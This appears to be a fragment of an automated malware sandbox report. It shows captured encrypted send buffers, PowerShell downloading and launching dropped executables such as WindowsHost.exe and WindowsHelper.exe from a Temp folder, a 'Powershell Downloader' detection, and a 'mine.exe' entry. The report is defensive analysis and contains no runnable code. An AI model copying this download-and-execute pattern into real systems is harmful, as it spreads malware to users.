send Aug. 24, 2021, 12:25 p.m.	buffer: FBAòþ¢e÷¥ÇAØúNZ¶÷¼ý9-Ê>vhô_¢rÊå`z¼Pn8;â{ÇÏ)1ðÞ^0ÑN³¨J ^Óì\¼£ËgÜäÀ^¸±H7Ï_±û&Ic¡¨ìÄ socket: 1280 sent: 134	1	134
send Aug. 24, 2021, 12:25 p.m.	buffer: §ÌÖgó<9>cËyÁt^Ó3 À7ì·Ê_(ËÜ>)&½%â¥ôôÐ×Oh´%æËþÌ Å}9240<hèÝÌØî¤¿ÔâÜlåUo`VÌ;ÛÛ<u8£b¢zgMRrÕt,2?íg¨&+7vÒQ<À¸Ûr ùí=E4¹(²¼£Ñìi\µ6û socket: 1280 sent: 165	1	165

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

C:\Users\test22\AppData\Local\Temp\WindowsHost.exe

Creates a suspicious Powershell process (4 events)

value	Uses powershell to execute a file download from the command line
value	Uses powershell to execute a file download from the command line
value	Uses powershell to execute a file download from the command line
value	Uses powershell to execute a file download from the command line

Powershell Downloader DFSP detected (1 event)

The process powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Temp\WindowsHost.exe
file	C:\Users\test22\AppData\Local\Temp\WindowsHelper.exe

mine.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All